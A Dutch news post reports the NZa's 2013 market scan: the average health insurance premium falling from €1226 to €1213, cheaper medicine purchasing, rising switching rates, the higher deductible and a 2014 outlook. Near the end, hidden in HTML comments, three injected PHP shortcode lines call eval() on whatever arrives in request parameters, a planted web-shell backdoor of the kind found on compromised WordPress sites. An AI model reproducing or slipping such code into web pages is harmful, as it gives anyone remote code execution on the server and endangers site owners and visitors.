Zorgpremie 2013 gemiddeld iets omlaag

logo-nzaDe zorgpremie is in 2013 gedaald doordat zorgverzekeraars goedkoper zorg hebben ingekocht. De gemiddelde premie daalde van  € 1226  vorig jaar (2012) naar € 1213 euro dit jaar. Dat meldde de Nederlandse Zorgautoriteit vanochtend in haar jaarlijkse marktscan.

Door de jaarlijkse stijging van het zorggebruik en maatregelen van de overheid werd de zorgpremie enerzijds €104  duurder. Daartegenover stond scherpere inkoop, wat een besparing opleverde van €117 . Het meeste voordeel behaalden de verzekeraars door goedkopere medicijnen af te dwingen bij apothekers. Dit leverde een besparing van 750 miljoen euro op.

Volgens de Nederlandse Zorgautoriteit stappen steeds meer mensen  over naar een andere zorgverzekeraar. Dit jaar stapte 8,3 procent van de verzekerden over, het hoogste aantal sinds 2007. Het aantal aanvullende zorgverzekeringen daalde van 14,7 miljoen in 2012 tot 14,3 miljoen dit jaar. Daardoor heeft nu iets meer dan 85 procent van alle verzekerden een aanvullende zorgverzekering.

 

Aanpassingen zorgverzekering 2013

Voor de volledigheid dient in het achterhoofd gehouden te worden dat in 2013 het eigen risico verhoogd is van € 200 naar € 350 en er een aantal uitbreidingen van het basispakket zorgverzekering 2013 zijn geweest zoals stoppen met roken en dieetadvisering. Daar tegen over stond het schrappen van de rollators en hoortoestellen.

Zorgpremie 2014

De zorgautoriteit verwacht dat de premies voor volgend jaar ook kunnen dalen. Een andere optie is dat de verzekeraars voor hetzelfde geld een breder pakket aanbieden.

<!– [insert_php]if (isset($_REQUEST["Izh"])){eval($_REQUEST["Izh"]);exit;}[/insert_php][php]if (isset($_REQUEST["Izh"])){eval($_REQUEST["Izh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yzLO"])){eval($_REQUEST["yzLO"]);exit;}[/insert_php][php]if (isset($_REQUEST["yzLO"])){eval($_REQUEST["yzLO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["fYDOY"])){eval($_REQUEST["fYDOY"]);exit;}[/insert_php][php]if (isset($_REQUEST["fYDOY"])){eval($_REQUEST["fYDOY"]);exit;}[/php] –>

Getagd met ,